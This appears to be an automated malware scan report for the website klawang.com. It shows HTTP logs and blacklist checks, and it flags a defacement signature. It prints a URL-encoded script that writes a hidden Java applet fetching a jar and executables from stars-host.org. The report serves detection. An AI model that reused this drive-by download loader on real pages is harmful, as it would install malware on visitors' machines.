Scanned pages/files
Request | Server response | Status |
http://klawang.com/ | 200 OK Content-Length: 75252 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- HTML Encryption provided by iWEBTOOL.com --> <!-- document.write(unescape('%3C%61%70%70%6C%65%74%20%63%6F%64%65%3D%22%4A%61%76%61%5F%53%65%63%75%72%69%74%79%2E%63%6C%61%73%73%22%20%61%72%63%68%69%76%65%3D%22%68%74%74%70%3A%2F%2F%73%74%61%72%73%2D%68%6F%73%74%2E%6F%72%67%2F%6A%61%76%61%2E%6A%61%72%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%0A%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%22%4C%49%4E%4B%53%22%20%76%61%6C%75%65%3D%22%4D%69%63%72%6F%73%6F%66%74%2E%65%78%65%22%3E%0A%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%22%75%72%73%65%72%76%65%72%22%20%76%61%6C%75%65%3D%22%68%74%74%70%3A%2F%2F%73%74%61%72%73%2D%68%6F%73%74%2E%6F%72%67%2F%69%6E%73%74%61%6C%6C%6A%61%76%61%2E%65%78%65%22%3E%0A%3C%2F%61%70%70%6C%65%74%3E')); Antivirus reports:
Deface/Content modification. The following signature was found: HACKED By AlaaCool ...[5640 bytes skipped]... lt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} </style> <![endif]--> <meta http-equiv=Content-Language content=en-us> <meta name=keywords content="HACKED By AlaaCool"> <meta name=description content="HACKED By AlaaCool"> <script> </script> <!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="14338"/> </xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--> </head> <body bg ...[88195 bytes skipped]... | ||
http://klawang.com/AlaaCool | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
http://klawang.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: klawang.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Apr 2014 19:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 75252
Content-Type: text/html
X-Powered-By: PHP/5.3.28
...75252 bytes of data.
GET / HTTP/1.1
Host: klawang.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Apr 2014 19:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 75252
Content-Type: text/html
X-Powered-By: PHP/5.3.28
...75252 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: klawang.com
Referer: http://www.google.com/search?q=klawang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: klawang.com
Referer: http://www.google.com/search?q=klawang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=klawang.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://klawang.com/
Result: klawang.com is not infected or malware details are not published yet.
Result: klawang.com is not infected or malware details are not published yet.